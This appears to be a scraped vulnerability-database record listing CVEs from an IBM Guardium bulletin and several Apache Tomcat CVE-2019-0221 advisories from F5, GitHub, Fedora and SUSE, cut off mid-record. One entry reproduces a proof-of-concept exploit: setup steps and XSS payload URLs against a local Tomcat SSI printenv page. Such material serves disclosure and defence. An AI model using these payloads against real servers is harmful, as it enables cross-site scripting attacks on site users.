permitting of clients to keep streams open without reading/writing request data by the HTTP/2 implementation. By sending excessive SETTINGS frames, a remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/158637](<https://exchange.xforce.ibmcloud.com/vulnerabilities/158637>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2019-3778](<https://vulners.com/cve/CVE-2019-3778>) \n**DESCRIPTION: **Spring Security OAuth could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in authorization endpoint. An attacker could exploit this vulnerability using a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base score: 7.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/158330](<https://exchange.xforce.ibmcloud.com/vulnerabilities/158330>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N) \n \n**CVEID: **[CVE-2019-11269](<https://vulners.com/cve/CVE-2019-11269>) \n**DESCRIPTION: **Spring Security OAuth could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability. An attacker could exploit this vulnerability using redirect_uri parameter in a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base score: 7.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/162650](<https://exchange.xforce.ibmcloud.com/vulnerabilities/162650>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N) \n \n**CVEID: **[CVE-2019-3795](<https://vulners.com/cve/CVE-2019-3795>) \n**DESCRIPTION: **Pivotal Spring Security could provide weaker than expected security, caused by an insecure randomness flaw when using SecureRandomFactoryBean#setSeed to configure a SecureRandom instance. A remote attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/159543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/159543>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N) \n \n**CVEID: **[CVE-2019-11272](<https://vulners.com/cve/CVE-2019-11272>) \n**DESCRIPTION: **Pivotal Spring Security could allow a remote attacker to bypass security restrictions, caused by a flaw in the PlaintextPasswordEncoder function. By using a password of \"null\", an attacker could exploit this vulnerability to bypass access restrictions. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/166568](<https://exchange.xforce.ibmcloud.com/vulnerabilities/166568>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n**CVEID: **[CVE-2018-1258](<https://vulners.com/cve/CVE-2018-1258>) \n**DESCRIPTION: **Pivotal Spring Framework Spring Security could allow a remote attacker to bypass security restrictions. By sending a specially-crafted request, an attacker could exploit this vulnerability to gain unauthorized access to methods that should be restricted. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/143314](<https://exchange.xforce.ibmcloud.com/vulnerabilities/143314>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n**CVEID: **[CVE-2018-1000613](<https://vulners.com/cve/CVE-2018-1000613>) \n**DESCRIPTION: **Legion of the Bouncy Castle Java Cryptography APIs could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe reflection flaw in XMSS/XMSS^MT private key deserialization. By using specially-crafted private key, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/148041](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148041>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2018-5382](<https://vulners.com/cve/CVE-2018-5382>) \n**DESCRIPTION: **Bouncy Castle could allow a local attacker to obtain sensitive information, caused by an error in the BKS version 1 keystore files. By utilizing an HMAC that is only 16 bits long for the MAC key size, an attacker could exploit this vulnerability using brute-force techniques to crack a BKS-V1 keystore file in seconds and gain access to the keystore contents. \nCVSS Base score: 4.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/140465](<https://exchange.xforce.ibmcloud.com/vulnerabilities/140465>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N) \n \n**CVEID: **[CVE-2016-1000346](<https://vulners.com/cve/CVE-2016-1000346>) \n**DESCRIPTION: **Bouncy Castle JCE Provider could allow a remote attacker to obtain sensitive information, caused by a flaw in the other party DH public key. A remote attacker could exploit this vulnerability to reveal details via invalid keys. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/151807](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151807>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID: **[CVE-2016-1000345](<https://vulners.com/cve/CVE-2016-1000345>) \n**DESCRIPTION: **Bouncy Castle JCE Provider could provide weaker than expected security, caused by an environment where timings can be easily observed. A remote attacker could exploit this vulnerability to conduct a padding oracle attack. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/151808](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151808>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID: **[CVE-2016-1000344](<https://vulners.com/cve/CVE-2016-1000344>) \n**DESCRIPTION: **Bouncy Castle JCE Provider could provide weaker than expected security, caused by a flaw in the DHIES implementation. A remote attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/151809](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151809>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID: **[CVE-2016-1000343](<https://vulners.com/cve/CVE-2016-1000343>) \n**DESCRIPTION: **Bouncy Castle JCE Provider could provide weaker than expected security, caused by a flaw in the DSA key pair generator. A remote attacker could exploit this vulnerability to launch further attacks. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/151810](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151810>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID: **[CVE-2016-1000342](<https://vulners.com/cve/CVE-2016-1000342>) \n**DESCRIPTION: **Bouncy Castle JCE Provider could provide weaker than expected security, caused by improper validation of ASN.1 encoding of signature in the ECDSA. A remote attacker could exploit this vulnerability to launch further attacks. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/151811](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151811>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID: **[CVE-2016-1000341](<https://vulners.com/cve/CVE-2016-1000341>) \n**DESCRIPTION: **Bouncy Castle JCE Provider could provide weaker than expected security, caused by a flaw in the DSA signature generation. A remote attacker could exploit this vulnerability to launch timing attacks. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/151812](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151812>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID: **[CVE-2018-1000180](<https://vulners.com/cve/CVE-2018-1000180>) \n**DESCRIPTION: **Bouncy Castle could provide weaker than expected security, caused by an error in the Low-level interface to RSA key pair generator. The RSA Key Pairs generated in low-level API with added certainty may have less M-R tests than expected. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/144810](<https://exchange.xforce.ibmcloud.com/vulnerabilities/144810>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n**CVEID: **[CVE-2016-1000339](<https://vulners.com/cve/CVE-2016-1000339>) \n**DESCRIPTION: **Bouncy Castle JCE Provider could allow a remote attacker to obtain sensitive information, caused by a flaw in the AESEngine. An attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/151814](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151814>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID: **[CVE-2016-1000338](<https://vulners.com/cve/CVE-2016-1000338>) \n**DESCRIPTION: **Bouncy Castle JCE Provider could provide weaker than expected security, caused by improper validation of ASN.1 encoding of signature in the DSA. A remote attacker could exploit this vulnerability to launch further attacks. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/151815](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151815>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID: **[CVE-2015-7940](<https://vulners.com/cve/CVE-2015-7940>) \n**DESCRIPTION: **Bouncy Castle could allow a remote attacker to obtain sensitive information. An attacker could exploit this vulnerability using an invalid curve attack to extract private keys used in elliptic curve cryptography and obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/107739](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107739>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID: **[CVE-2013-1624](<https://vulners.com/cve/CVE-2013-1624>) \n**DESCRIPTION: **Bouncy Castle could allow a remote attacker to obtain sensitive information, caused by the exposure of timing differences during padding check verification by the CBC ciphersuite of the Transport Layer Security (TLS) implementation. An attacker could exploit this vulnerability using a timing attack to recover the original plaintext and obtain sensitive information. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/81910](<https://exchange.xforce.ibmcloud.com/vulnerabilities/81910>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n \n**CVEID: **[CVE-2017-13098](<https://vulners.com/cve/CVE-2017-13098>) \n**DESCRIPTION: **Bouncy Castle could allow a remote attacker to obtain sensitive information, caused by an RSA Adaptive Chosen Ciphertext (Bleichenbacher) attack. By utilizing discrepancies in TLS error messages, an attacker could exploit this vulnerability to obtain the data in the encrypted messages once the TLS session has completed. Note: This vulnerability is also known as the ROBOT attack. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/136241](<https://exchange.xforce.ibmcloud.com/vulnerabilities/136241>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID: **[CVE-2019-4689](<https://vulners.com/cve/CVE-2019-4689>) \n**DESCRIPTION: **IBM Guardium Data Encryption (GDE) could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/171826](<https://exchange.xforce.ibmcloud.com/vulnerabilities/171826>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n**CVEID: **[CVE-2016-6497](<https://vulners.com/cve/CVE-2016-6497>) \n**DESCRIPTION: **Apache could allow a remote attacker to execute arbitrary code on the system, caused by a LDAP entry poisoning vulnerability in main/java/org/apache/directory/groovyldap/LDAP.java. By leveraging setting returnObjFlag to true for all search methods, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/125218](<https://exchange.xforce.ibmcloud.com/vulnerabilities/125218>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID: **[CVE-2018-10237](<https://vulners.com/cve/CVE-2018-10237>) \n**DESCRIPTION: **Google Guava is vulnerable to a denial of service, caused by improper eager allocation checks in the AtomicDoubleArray and CompoundOrdering class. By sending a specially-crafted data, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/142508](<https://exchange.xforce.ibmcloud.com/vulnerabilities/142508>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2018-1000850](<https://vulners.com/cve/CVE-2018-1000850>) \n**DESCRIPTION: **Square Retrofit could allow a remote attacker to traverse directories on the system, caused by improper input validation by the RequestBuilder class. An attacker could send a specially-crafted URL request to containing \"dot dot\" sequences (/../) to add or delete arbitrary files on the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/154507](<https://exchange.xforce.ibmcloud.com/vulnerabilities/154507>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n**CVEID: **[CVE-2019-4686](<https://vulners.com/cve/CVE-2019-4686>) \n**DESCRIPTION: **IBM Guardium Data Encryption (GDE) does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/171822](<https://exchange.xforce.ibmcloud.com/vulnerabilities/171822>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nGDE | 3.0.0.2 \n \n## Remediation/Fixes\n\nProduct(s) | Fixed Version \n---|--- \nGDE | [4.0.0.3](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=9269c25b1b795410f2888739cd4bcb16> \"4.0.0.0\" ) \n \n## Workarounds and Mitigations\n\nAffected Component | Fixed Version \n---|--- \nIBM Guardium for Cloud Key Management (GCKM) | GCKM 1.7.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-08-24T10:03:43", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in IBM Guardium Data Encryption (GDE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1624", "CVE-2015-7940", "CVE-2016-1000338", "CVE-2016-1000339", "CVE-2016-1000341", "CVE-2016-1000342", "CVE-2016-1000343", "CVE-2016-1000344", "CVE-2016-1000345", "CVE-2016-1000346", "CVE-2016-6497", "CVE-2017-12972", "CVE-2017-12973", "CVE-2017-12974", "CVE-2017-13098", "CVE-2017-7656", "CVE-2017-7657", "CVE-2017-7658", "CVE-2017-9735", "CVE-2018-1000180", "CVE-2018-1000613", "CVE-2018-1000850", "CVE-2018-1000873", "CVE-2018-10237", "CVE-2018-12536", "CVE-2018-1258", "CVE-2018-14719", "CVE-2018-14720", "CVE-2018-14721", "CVE-2018-19360", "CVE-2018-19361", "CVE-2018-19362", "CVE-2018-5382", "CVE-2019-0199", "CVE-2019-0221", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-10241", "CVE-2019-10247", "CVE-2019-11269", "CVE-2019-11272", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12814", "CVE-2019-3778", "CVE-2019-3795", "CVE-2019-4686", "CVE-2019-4688", "CVE-2019-4689", "CVE-2019-4691", "CVE-2019-4694", "CVE-2019-4697", "CVE-2019-4699"], "modified": "2020-08-24T10:03:43", "id": "B236D3400A0C6106EC62C77931DC3654EEBAB6EEA563B3344ECFF477FD634E81", "href": "https://www.ibm.com/support/pages/node/6320835", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2023-02-21T21:46:45", "description": "The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. ([CVE-2019-0221](<https://vulners.com/cve/CVE-2019-0221>))\n\nImpact\n\nAn attacker may be able to exploit this vulnerability to perform a cross-site scripting (XSS) attack.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-10-10T18:30:00", "type": "f5", "title": "Apache Tomcat vulnerability CVE-2019-0221", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2019-10-10T18:30:00", "id": "F5:K13184144", "href": "https://support.f5.com/csp/article/K13184144", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2021-12-03T01:56:03", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2021-07-13T00:00:00", "type": "zdt", "title": "Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS) Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2021-07-13T00:00:00", "id": "1337DAY-ID-36546", "href": "https://0day.today/exploit/description/36546", "sourceData": "# Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)\n# Exploit Author: Central InfoSec\n# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93\n# CVE : CVE-2019-0221\n\n# Requirements:\n\n# SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default.\n\n# A file (usually \"*.shtml\") with the \"printenv\" SSI directive must exist within the web application.\n\n# The file must be accessible.\n\n\n\n# Proof of Concept:\n\n# Install a Java Runtime Environment (JRE)\n\n# Download a vulnerable version of Tomcat and extract the contents\n\n# Modify line 19 of the conf\\context.xml file to globally enable privileged context\nContext privileged=\"true\">\n\n# Modify conf\\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide\n\n# Put the following code in \"webapps/ROOT/ssi/printenv.shtml\"\n<html>\n <body>\n Echo:  \n Printenv: \n </body>\n</html>\n\n# Run Tomcat\ncd bin\ncatalina run\n\n# Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the \"echo\" directive which escapes properly and the \"printenv\" directive which does not escape properly\nhttp://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3E\nhttp://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E\n", "sourceHref": "https://0day.today/exploit/36546", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "github": [{"lastseen": "2023-02-01T05:08:39", "description": "The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-05-30T03:30:42", "type": "github", "title": "Cross-site scripting in Apache Tomcat", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2023-02-01T05:02:01", "id": "GHSA-JJPQ-GP5Q-8Q6W", "href": "https://github.com/advisories/GHSA-jjpq-gp5q-8q6w", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2021-07-28T14:46:51", "description": "Tomcat is the servlet container that is used in the official Reference Implementation for the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed by Sun under the Java Community Process. Tomcat is developed in an open and participatory environment and released under the Apache Software License version 2.0. Tomcat is intended to be a collaboration of the best-of-breed developers from around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-06-25T01:27:24", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: tomcat-9.0.21-1.fc30", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221"], "modified": "2019-06-25T01:27:24", "id": "FEDORA:07D2762C825F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZQTZ5BJ5F4KV6N53SGNKSW3UY5DBIQ46/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "Tomcat is the servlet container that is used in the official Reference Implementation for the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed by Sun under the Java Community Process. Tomcat is developed in an open and participatory environment and released under the Apache Software License version 2.0. Tomcat is intended to be a collaboration of the best-of-breed developers from around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-07-04T02:51:06", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: tomcat-9.0.21-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11784", "CVE-2019-0199", "CVE-2019-0221"], "modified": "2019-07-04T02:51:06", "id": "FEDORA:87CE1617FCD1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NPHQEL5AQ6LZSZD2Y6TYZ4RC3WI7NXJ3/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "suse": [{"lastseen": "2022-11-08T06:11:45", "description": "An update that solves two vulnerabilities and has one\n errata is now available.\n\nDescription:\n\n This update for tomcat to version 9.0.20 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-0199: Fixed a denial of service in the HTTP/2 implementation\n related to streams with excessive numbers of SETTINGS frames\n (bsc#1131055).\n - CVE-2019-0221: Fixed a cross site scripting vulnerability with the SSI\n printenv command (bsc#1136085).\n\n Non-security issues fixed:\n\n - Increase maximum number of threads and open files for tomcat\n (bsc#1111966).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-1673=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-06-30T00:00:00", "type": "suse", "title": "Security update for tomcat (moderate)", "bulletinFamily": "unix", "cvss2": 